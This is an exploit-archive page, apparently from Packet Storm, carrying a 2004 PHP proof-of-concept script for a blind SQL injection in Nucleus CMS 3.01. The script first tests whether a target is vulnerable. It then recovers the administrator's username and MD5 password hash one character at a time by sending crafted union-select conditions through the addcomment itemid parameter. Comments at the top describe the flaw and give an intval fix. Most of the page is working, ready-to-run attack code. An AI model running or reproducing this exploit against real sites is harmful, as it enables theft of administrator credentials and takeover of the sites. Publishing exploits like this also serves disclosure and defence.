what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

nucleusCMSSQL.txt

nucleusCMSSQL.txt
Posted Jul 27, 2004
Authored by aCiDBiTS

Nucleus CMS version 3.01 addcoment/itemid SQL Injection Proof of Concept PHP exploit that dumps the username and md5 hash of the password for the administrator user.

tags | exploit, php, sql injection, proof of concept
SHA-256 | f381b9e4184efeb21af8394ab8bfa4585b0b12a1ecc75b4d37d1c396de95e22d

nucleusCMSSQL.txt

Change Mirror Download
#!/usr/bin/php

<?


// Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept
// By aCiDBiTS acidbits@hotmail.com 24-July-2004
//
// Nucleus CMS (http://nucleuscms.org) is a weblog php+mysql application.
//
// This Proof of Concept dumps the username and MD5(password) of the admin
user placed at first position
// of members table. First of all checks if we can use "union select" or it
isn't patched and then if first
// member is admin.
//
// Usage (in my debian box):
// php4 -q nuc_addc_poc.php URL


// Vulnerability description
//
// In action.php, function addcoment, there's no user input sanization for
parameter itemid. In line 65:
// $blogid = getBlogIDFromItemID($post['itemid']);
// This allows to inject SQL to get data form the database.
//
// Solution
//
// Modify line 65 with:
// $blogid = getBlogIDFromItemID(intval($post['itemid']));




echo
"+-------------------------------------------------------------------+\n|
Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept |\n| By
aCiDBiTS acidbits@hotmail.com 24-July-2004
|\n+-------------------------------------------------------------------+\n\n
";

if($argc<2) die("Usage: ".$argv[0]." URL\n\n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';

echo "Checking if vulnerable and \"union select\" works ... ";
if( test_cond("1") && !test_cond("0") ) echo "OK!\n";
else die( "It doesn't :-(\n\n" );

echo "Checking if first member of table is admin ... ";
if( test_cond("1") ) echo "OK!\n";
else die( "It's not :-(\n\n" );

echo "\nGetting username: ";
get_field("mname");
echo "\nGetting MD5(password): ";
get_field("mpassword");

die("\n\nDone!\n\n");


function get_field( $field )
{
$unval= "
0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
$idx=1;
$min=0;
$max=strlen($unval);
while($min!=$max) {
$mid=$min+(($max-$min)/2);
if(
test_cond("ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1))) ) {
$idx++;
echo substr($unval,$mid,1);
$min=0;
$max=strlen($unval);
if( !test_cond("ord(substring($field,$idx,1))") )
return;
} else {
if(
test_cond("ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1))) )
$max=$mid;
else $min=$mid;
}
}
die( "\n\nUnexpected error!\n\n");
}


function test_cond( $cond )
{

$res=send_post("action=addcomment&url=index.php%3Fitemid%3D1&itemid=1+and+0+
union+select+1+from+nucleus_member+where+madmin+and+mnumber=1+and+".urlencod
e($cond)."&body=a&user=a&userid=");
if( eregi( "nucleus_ban", $res ) )
return 0;
else return 1;
}

function send_post($data)
{
global $host;
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $host."action.php" );
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
$data=curl_exec ($ch);
curl_close ($ch);

return $data;
}

?>
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close